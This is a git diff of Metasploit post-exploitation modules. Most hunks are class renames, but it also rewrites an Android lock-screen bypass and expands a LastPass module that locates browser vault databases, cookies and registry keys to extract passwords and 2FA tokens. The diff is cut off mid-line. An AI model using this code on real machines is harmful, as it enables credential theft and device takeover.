diff --git a/modules/post/android/manage/remove_lock.rb b/modules/post/android/manage/remove_lock.rb
index 817cc60fb4..84087c6e21 100644
--- a/modules/post/android/manage/remove_lock.rb
+++ b/modules/post/android/manage/remove_lock.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit4 < Msf::Post
+class MetasploitModule < Msf::Post
 Rank = NormalRanking
 include Msf::Post::Common
@@ -63,13 +63,12 @@ class Metasploit4 < Msf::Post
 return
 end
- output = cmd_exec('am start -n com.android.settings/com.android.settings.ChooseLockGeneric --ez confirm_credentials false --ei lockscreen.password_type 0 --activity-clear-task')
- if output =~ /Error:/
- print_error("The Intent could not be started")
- vprint_status("Command output: #{output}")
- else
+ result = session.android.activity_start('intent:#Intent;launchFlags=0x8000;component=com.android.settings/.ChooseLockGeneric;i.lockscreen.password_type=0;B.confirm_credentials=false;end')
+ if result.nil?
 print_good("Intent started, the lock screen should now be a dud.")
 print_good("Go ahead and manually swipe or provide any pin/password/pattern to continue.")
+ else
+ print_error("The Intent could not be started: #{result}")
 end
 end
diff --git a/modules/post/android/manage/remove_lock_root.rb b/modules/post/android/manage/remove_lock_root.rb
index 1a71658619..0ae5eebf89 100644
--- a/modules/post/android/manage/remove_lock_root.rb
+++ b/modules/post/android/manage/remove_lock_root.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit4 < Msf::Post
+class MetasploitModule < Msf::Post
 include Msf::Post::Common
 include Msf::Post::Android::Priv
diff --git a/modules/post/cisco/gather/enum_cisco.rb b/modules/post/cisco/gather/enum_cisco.rb
index 515c7b8595..a6e54b26b8 100644
--- a/modules/post/cisco/gather/enum_cisco.rb
+++ b/modules/post/cisco/gather/enum_cisco.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'rex'
 require 'msf/core/auxiliary/cisco'
-class Metasploit3 < Msf::Post
+class MetasploitModule < Msf::Post
 include Msf::Auxiliary::Cisco
 def initialize(info={})
 super( update_info( info,
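Review bot: In the second hunk of `modules/post/android/manage/remove_lock.rb`, the new branch treats a `nil` return from `session.android.activity_start` as success and any other value as an error message, but nothing in the hunk states that contract, so `if result.nil?` reads as inverted. A one-line comment such as `# activity_start returns nil on success, otherwise an error string` (to be confirmed against the API) would fix that, and a second one should name the flag behind `launchFlags=0x8000`, which appears to stand in for the removed `--activity-clear-task` switch. The call also requires the session to expose `session.android`, which the removed `cmd_exec` line did not. The module's session-type declaration and the start of the enclosing method are outside the hunk, so check that the declaration was narrowed to match.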
diff --git a/modules/post/firefox/gather/cookies.rb b/modules/post/firefox/gather/cookies.rb
index 4fc5f6cc6e..759e70c05f 100644
--- a/modules/post/firefox/gather/cookies.rb
+++ b/modules/post/firefox/gather/cookies.rb
@@ -6,7 +6,7 @@ require 'json'
 require 'msf/core'
-class Metasploit3 < Msf::Post
+class MetasploitModule < Msf::Post
 include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
diff --git a/modules/post/firefox/gather/history.rb b/modules/post/firefox/gather/history.rb
index 932105e952..f35e4e02c8 100644
--- a/modules/post/firefox/gather/history.rb
+++ b/modules/post/firefox/gather/history.rb
@@ -6,7 +6,7 @@ require 'json'
 require 'msf/core'
-class Metasploit3 < Msf::Post
+class MetasploitModule < Msf::Post
 include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
diff --git a/modules/post/firefox/gather/passwords.rb b/modules/post/firefox/gather/passwords.rb
index 0009613d36..714b3f5a29 100644
--- a/modules/post/firefox/gather/passwords.rb
+++ b/modules/post/firefox/gather/passwords.rb
@@ -7,7 +7,7 @@ require 'json'
 require 'msf/core'
 require 'msf/core/payload/firefox'
-class Metasploit3 < Msf::Post
+class MetasploitModule < Msf::Post
 include Msf::Payload::Firefox
 include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
diff --git a/modules/post/firefox/gather/xss.rb b/modules/post/firefox/gather/xss.rb
index dbe1b8a48c..978f57a9d9 100644
--- a/modules/post/firefox/gather/xss.rb
+++ b/modules/post/firefox/gather/xss.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'json'
 require 'msf/core/payload/firefox'
-class Metasploit3 < Msf::Post
+class MetasploitModule < Msf::Post
 include Msf::Payload::Firefox
 include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
diff --git a/modules/post/firefox/manage/webcam_chat.rb b/modules/post/firefox/manage/webcam_chat.rb
index 5e568c8584..ff87056b00 100644
--- a/modules/post/firefox/manage/webcam_chat.rb
+++ b/modules/post/firefox/manage/webcam_chat.rb
@@ -6,7 +6,7 @@ require 'json'
 require 'msf/core'
-class Metasploit3 < Msf::Post
+class MetasploitModule < Msf::Post
 include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
 include Msf::Post::WebRTC
diff --git a/modules/post/linux/busybox/enum_connections.rb b/modules/post/linux/busybox/enum_connections.rb
index 473c55c7de..47b2ca2e29 100644
--- a/modules/post/linux/busybox/enum_connections.rb
+++ b/modules/post/linux/busybox/enum_connections.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Post
+class MetasploitModule < Msf::Post
 include Msf::Post::File
 include Msf::Post::Linux::BusyBox
diff --git a/modules/post/linux/busybox/enum_hosts.rb b/modules/post/linux/busybox/enum_hosts.rb
index 996a6f377f..0d63021bf6 100644
--- a/modules/post/linux/busybox/enum_hosts.rb
+++ b/modules/post/linux/busybox/enum_hosts.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Post
+class MetasploitModule < Msf::Post
 include Msf::Post::File
 include Msf::Post::Linux::BusyBox
diff --git a/modules/post/linux/busybox/jailbreak.rb b/modules/post/linux/busybox/jailbreak.rb
index 9db686e65a..71b1d87852 100644
--- a/modules/post/linux/busybox/jailbreak.rb
+++ b/modules/post/linux/busybox/jailbreak.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Post
+class MetasploitModule < Msf::Post
 METHODS = [ 'cat xx || sh',
diff --git a/modules/post/linux/busybox/ping_net.rb b/modules/post/linux/busybox/ping_net.rb
index 4e1191304b..84c1d280c2 100644
--- a/modules/post/linux/busybox/ping_net.rb
+++ b/modules/post/linux/busybox/ping_net.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Post
+class MetasploitModule < Msf::Post
 include Msf::Post::File
diff --git a/modules/post/linux/busybox/set_dmz.rb b/modules/post/linux/busybox/set_dmz.rb
index a2d109cd6b..ee86fec3ee 100644
--- a/modules/post/linux/busybox/set_dmz.rb
+++ b/modules/post/linux/busybox/set_dmz.rb
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize super( diff --git a/modules/post/linux/busybox/set_dns.rb b/modules/post/linux/busybox/set_dns.rb index 7732059d03..274b253750 100644 --- a/modules/post/linux/busybox/set_dns.rb +++ b/modules/post/linux/busybox/set_dns.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/busybox/smb_share_root.rb b/modules/post/linux/busybox/smb_share_root.rb index f89e57e6c1..4570a66659 100644 --- a/modules/post/linux/busybox/smb_share_root.rb +++ b/modules/post/linux/busybox/smb_share_root.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/busybox/wget_exec.rb b/modules/post/linux/busybox/wget_exec.rb index 38e90216a0..7a55694dc4 100644 --- a/modules/post/linux/busybox/wget_exec.rb +++ b/modules/post/linux/busybox/wget_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/gather/checkvm.rb b/modules/post/linux/gather/checkvm.rb index c3085a1104..d7feb3cfdf 100644 --- a/modules/post/linux/gather/checkvm.rb +++ b/modules/post/linux/gather/checkvm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/ecryptfs_creds.rb b/modules/post/linux/gather/ecryptfs_creds.rb index 21bbd3f3eb..ca171c856d 100644 --- a/modules/post/linux/gather/ecryptfs_creds.rb +++ b/modules/post/linux/gather/ecryptfs_creds.rb 
@@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/linux/gather/enum_configs.rb b/modules/post/linux/gather/enum_configs.rb index 8e6ca7cf9d..bff25534cb 100644 --- a/modules/post/linux/gather/enum_configs.rb +++ b/modules/post/linux/gather/enum_configs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_network.rb b/modules/post/linux/gather/enum_network.rb index ba52141294..9fa3847f37 100644 --- a/modules/post/linux/gather/enum_network.rb +++ b/modules/post/linux/gather/enum_network.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/enum_protections.rb b/modules/post/linux/gather/enum_protections.rb index ab18a0c403..97d4ea05a8 100644 --- a/modules/post/linux/gather/enum_protections.rb +++ b/modules/post/linux/gather/enum_protections.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_psk.rb b/modules/post/linux/gather/enum_psk.rb index 9edc2a7ada..1afa0fbff1 100644 --- a/modules/post/linux/gather/enum_psk.rb +++ b/modules/post/linux/gather/enum_psk.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/enum_system.rb b/modules/post/linux/gather/enum_system.rb index e96331fa98..6c9b242fa4 100644 --- a/modules/post/linux/gather/enum_system.rb +++ b/modules/post/linux/gather/enum_system.rb 
@@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_users_history.rb b/modules/post/linux/gather/enum_users_history.rb index 6feeb24323..8eeead4bf4 100644 --- a/modules/post/linux/gather/enum_users_history.rb +++ b/modules/post/linux/gather/enum_users_history.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_xchat.rb b/modules/post/linux/gather/enum_xchat.rb index c6a722884d..c4b236a5f4 100644 --- a/modules/post/linux/gather/enum_xchat.rb +++ b/modules/post/linux/gather/enum_xchat.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb index ef049898e8..8956ccb5c1 100644 --- a/modules/post/linux/gather/gnome_commander_creds.rb +++ b/modules/post/linux/gather/gnome_commander_creds.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/linux/gather/hashdump.rb b/modules/post/linux/gather/hashdump.rb index eb049ae7da..6a18d942a1 100644 --- a/modules/post/linux/gather/hashdump.rb +++ b/modules/post/linux/gather/hashdump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/mount_cifs_creds.rb b/modules/post/linux/gather/mount_cifs_creds.rb index ed33627410..c7ec0cf23f 100644 --- a/modules/post/linux/gather/mount_cifs_creds.rb 
+++ b/modules/post/linux/gather/mount_cifs_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/linux/gather/openvpn_credentials.rb b/modules/post/linux/gather/openvpn_credentials.rb index 2ca64520ce..0cd46d392e 100644 --- a/modules/post/linux/gather/openvpn_credentials.rb +++ b/modules/post/linux/gather/openvpn_credentials.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/pptpd_chap_secrets.rb b/modules/post/linux/gather/pptpd_chap_secrets.rb index cbdbfb31dd..ff663ff65f 100644 --- a/modules/post/linux/gather/pptpd_chap_secrets.rb +++ b/modules/post/linux/gather/pptpd_chap_secrets.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/linux/manage/download_exec.rb b/modules/post/linux/manage/download_exec.rb index 5e15132d46..548540a9a2 100644 --- a/modules/post/linux/manage/download_exec.rb +++ b/modules/post/linux/manage/download_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/multi/escalate/cups_root_file_read.rb b/modules/post/multi/escalate/cups_root_file_read.rb index 578ae8ba22..195d8fe714 100644 --- a/modules/post/multi/escalate/cups_root_file_read.rb +++ b/modules/post/multi/escalate/cups_root_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File LP_GROUPS = ['lpadmin', '_lpadmin'] 
diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index ab9535c6c3..4466a0e513 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/local/linux' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post Rank = ManualRanking include Msf::Post::File diff --git a/modules/post/multi/gather/apple_ios_backup.rb b/modules/post/multi/gather/apple_ios_backup.rb index 31d07e1ba0..2169ad9443 100644 --- a/modules/post/multi/gather/apple_ios_backup.rb +++ b/modules/post/multi/gather/apple_ios_backup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/parser/apple_backup_manifestdb' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/check_malware.rb b/modules/post/multi/gather/check_malware.rb index 8a2104215d..a82dd47fda 100644 --- a/modules/post/multi/gather/check_malware.rb +++ b/modules/post/multi/gather/check_malware.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/http' require 'uri' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index 8c07940817..fd2ced019f 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -8,7 +8,7 @@ require 'msf/core/auxiliary/report' require 'openssl' require 'digest/md5' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/dns_bruteforce.rb b/modules/post/multi/gather/dns_bruteforce.rb index 3c987cc114..7a09697aa8 100644 --- a/modules/post/multi/gather/dns_bruteforce.rb +++ b/modules/post/multi/gather/dns_bruteforce.rb 
@@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/dns_reverse_lookup.rb b/modules/post/multi/gather/dns_reverse_lookup.rb index 8e562b4db8..cf0162c180 100644 --- a/modules/post/multi/gather/dns_reverse_lookup.rb +++ b/modules/post/multi/gather/dns_reverse_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/dns_srv_lookup.rb b/modules/post/multi/gather/dns_srv_lookup.rb index 3ae16da37f..4ceec2f5de 100644 --- a/modules/post/multi/gather/dns_srv_lookup.rb +++ b/modules/post/multi/gather/dns_srv_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/modules/post/multi/gather/enum_vbox.rb b/modules/post/multi/gather/enum_vbox.rb index 283ffbfa7b..f9b60a3204 100644 --- a/modules/post/multi/gather/enum_vbox.rb +++ b/modules/post/multi/gather/enum_vbox.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'yaml' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/env.rb b/modules/post/multi/gather/env.rb index 34938cb19b..19d2c67538 100644 --- a/modules/post/multi/gather/env.rb +++ b/modules/post/multi/gather/env.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry diff --git a/modules/post/multi/gather/fetchmailrc_creds.rb b/modules/post/multi/gather/fetchmailrc_creds.rb index 9b9de9aff2..86d97c0462 100644 --- a/modules/post/multi/gather/fetchmailrc_creds.rb +++ b/modules/post/multi/gather/fetchmailrc_creds.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/filezilla_client_cred.rb b/modules/post/multi/gather/filezilla_client_cred.rb index 736c4b9fc3..c793a9b201 100644 --- a/modules/post/multi/gather/filezilla_client_cred.rb +++ b/modules/post/multi/gather/filezilla_client_cred.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/find_vmx.rb b/modules/post/multi/gather/find_vmx.rb index eb16f3e85b..0382afde76 100644 --- a/modules/post/multi/gather/find_vmx.rb +++ b/modules/post/multi/gather/find_vmx.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'yaml' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/firefox_creds.rb b/modules/post/multi/gather/firefox_creds.rb index fde3b370a8..7afe0485f9 100644 --- a/modules/post/multi/gather/firefox_creds.rb +++ b/modules/post/multi/gather/firefox_creds.rb @@ -21,7 +21,7 @@ require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/gpg_creds.rb b/modules/post/multi/gather/gpg_creds.rb index 6c296d9118..2dd4f4a106 100644 --- a/modules/post/multi/gather/gpg_creds.rb +++ b/modules/post/multi/gather/gpg_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index 05941ee7cf..687268b39d 100644 
--- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -1,31 +1,40 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + require 'msf/core' -require 'base64' require 'sqlite3' require 'uri' +require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles include Msf::Post::OSX::System include Msf::Post::Unix def initialize(info = {}) - super( - update_info( - info, - 'Name' => 'LastPass Master Password Extractor', - 'Description' => 'This module extracts and decrypts LastPass master login accounts and passwords', - 'License' => MSF_LICENSE, - 'Author' => [ + super(update_info(info, + 'Name' => 'LastPass Vault Decryptor', + 'Description' => %q{ + This module extracts and decrypts LastPass master login accounts and passwords, + encryption keys, 2FA tokens and all the vault passwords + }, + 'License' => MSF_LICENSE, + 'Author' => + [ 'Alberto Garcia Illera <agarciaillera[at]gmail.com>', # original module and research 'Martin Vigo <martinvigo[at]gmail.com>', # original module and research 'Jon Hart <jon_hart[at]rapid7.com>' # module rework and cleanup ], - 'Platform' => %w(linux osx unix win), - 'References' => [['URL', 'http://www.martinvigo.com/a-look-into-lastpass/']], - 'SessionTypes' => %w(meterpreter shell) - ) - ) + 'Platform' => %w(linux osx unix win), + 'References' => + [ + [ 'URL', 'http://www.martinvigo.com/even-the-lastpass-will-be-stolen-deal-with-it' ] + ], + 'SessionTypes' => %w(meterpreter shell) + )) end def run 
@@ -42,129 +51,108 @@ class Metasploit3 < Msf::Post return end - print_status "Extracting credentials from #{account_map.size} LastPass databases" + print_status "Extracting credentials" + extract_credentials(account_map) - # an array of [user, encrypted password, browser] - credentials = [] # All credentials to be decrypted - account_map.each_pair do |account, browser_map| - browser_map.each_pair do |browser, paths| - if browser == 'Firefox' - paths.each do |path| - data = read_file(path) - loot_path = store_loot( - 'firefox.preferences', - 'text/javascript', - session, - data, - nil, - "Firefox preferences file #{path}" - ) + print_status "Extracting 2FA tokens" + extract_2fa_tokens(account_map) - # Extract usernames and passwords from preference file - firefox_credentials(loot_path).each do |creds| - credentials << [account, browser, URI.unescape(creds[0]), URI.unescape(creds[1])] - end - end - else # Chrome, Safari and Opera - paths.each do |path| - data = read_file(path) - loot_path = store_loot( - "#{browser.downcase}.lastpass.database", - 'application/x-sqlite3', - session, - data, - nil, - "#{account}'s #{browser} LastPass database #{path}" - ) + print_status "Extracting vault and iterations" + extract_vault_and_iterations(account_map) - # Parsing/Querying the DB - db = SQLite3::Database.new(loot_path) - lastpass_user, lastpass_pass = db.execute( - "SELECT username, password FROM LastPassSavedLogins2 " \ - "WHERE username IS NOT NULL AND username != '' " \ - "AND password IS NOT NULL AND password != '';" - ).flatten - if lastpass_user && lastpass_pass - credentials << [account, browser, lastpass_user, lastpass_pass] - end - end - end - end - end + print_status "Extracting encryption keys" + extract_vault_keys(account_map) - credentials_table = Rex::Ui::Text::Table.new( - 'Header' => "LastPass credentials", - 'Indent' => 1, - 'Columns' => %w(Account Browser LastPass_Username LastPass_Password) - ) - # Parse and decrypt credentials - credentials.each do |row| 
# Decrypt passwords - account, browser, user, enc_pass = row - vprint_status "Decrypting password for #{account}'s #{user} from #{browser}" - password = clear_text_password(user, enc_pass) - credentials_table << [account, browser, user, password] - end - unless credentials.empty? - print_good credentials_table.to_s - path = store_loot( - "lastpass.creds", - "text/csv", - session, - credentials_table.to_csv, - nil, - "Decrypted LastPass Master Passwords" - ) - end + print_lastpass_data(account_map) end - # Returns a mapping of { Account => { Browser => paths } } + # Returns a mapping of lastpass accounts def build_account_map platform = session.platform profiles = user_profiles - found_dbs_map = {} - - if datastore['VERBOSE'] - vprint_status "Found #{profiles.size} users: #{profiles.map { |p| p['UserName'] }.join(', ')}" - else - print_status "Found #{profiles.size} users" - end + account_map = {} profiles.each do |user_profile| account = user_profile['UserName'] browser_path_map = {} + localstorage_path_map = {} + cookies_path_map = {} case platform when /win/ browser_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\databases\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0", 'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", - 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\databases\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0", - 'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\Databases\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0" + 'IE' => "#{user_profile['LocalAppData']}Low\\LastPass", + 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\databases\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0" + } + localstorage_path_map = { + 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", + 
'Firefox' => "#{user_profile['LocalAppData']}Low\\LastPass", + 'IE' => "#{user_profile['LocalAppData']}Low\\LastPass", + 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Local Storage\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage" + } + cookies_path_map = { + 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Cookies", + 'Firefox' => "", # It's set programmatically + 'IE' => "#{user_profile['LocalAppData']}\\Microsoft\\Windows\\INetCookies\\Low", + 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Cookies" } when /unix|linux/ browser_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0", - 'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox" + 'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", + 'Opera' => "#{user_profile['LocalAppData']}/.config/opera/databases/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0" + } + localstorage_path_map = { + 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", + 'Firefox' => "#{user_profile['LocalAppData']}/.lastpass", + 'Opera' => "#{user_profile['LocalAppData']}/.config/opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage" + } + cookies_path_map = { # TODO + 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/Cookies", + 'Firefox' => "", # It's set programmatically + 'Opera' => "#{user_profile['LocalAppData']}/.config/opera/Cookies" } when /osx/ browser_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0", - 'Firefox' => "#{user_profile['LocalAppData']}\\Firefox\\Profiles", + 'Firefox' => "#{user_profile['LocalAppData']}/Firefox/Profiles", 'Opera' => 
"#{user_profile['LocalAppData']}/com.operasoftware.Opera/databases/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0", 'Safari' => "#{user_profile['AppData']}/Safari/Databases/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0" } + localstorage_path_map = { + 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", + 'Firefox' => "#{user_profile['AppData']}/Containers/com.lastpass.LastPass/Data/Library/Application Support/LastPass", + 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage", + 'Safari' => "#{user_profile['AppData']}/Safari/LocalStorage/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage" + } + cookies_path_map = { # TODO + 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/Cookies", + 'Firefox' => "", # It's set programmatically + 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/Cookies", + 'Safari' => "#{user_profile['AppData']}/Cookies/Cookies.binarycookies" + } else print_error "Platform not recognized: #{platform}" end - found_dbs_map[account] = {} + account_map[account] = {} browser_path_map.each_pair do |browser, path| + account_map[account][browser] = {} db_paths = find_db_paths(path, browser, account) - found_dbs_map[account][browser] = db_paths unless db_paths.empty? 
+ if db_paths && db_paths.size > 0 + account_map[account][browser]['lp_db_path'] = db_paths.first + account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if file?(localstorage_path_map[browser]) || browser.match(/Firefox|IE/) + account_map[account][browser]['cookies_db'] = cookies_path_map[browser] if file?(cookies_path_map[browser]) || browser.match(/Firefox|IE/) + account_map[account][browser]['cookies_db'] = account_map[account][browser]['lp_db_path'].first.gsub("prefs.js", "cookies.sqlite") if (!account_map[account][browser]['lp_db_path'].blank? && browser == 'Firefox') + else + account_map[account].delete(browser) + end end end - found_dbs_map + account_map end # Returns a list of DB paths found in the victims' machine @@ -172,11 +160,14 @@ class Metasploit3 < Msf::Post paths = [] vprint_status "Checking #{account}'s #{browser}" - if browser == "Firefox" # Special case for Firefox - profiles = firefox_profile_files(path, browser) - paths |= profiles + if browser == "IE" # Special case for IE + data = read_registry_key_value('HKEY_CURRENT_USER\Software\LastPass', "LoginUsers") + data = read_registry_key_value('HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass', "LoginUsers") if data.blank? + paths |= ['HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass'] if !data.blank? && path != "Low\\LastPass" # Hacky way to detect if there is access to user's data (attacker 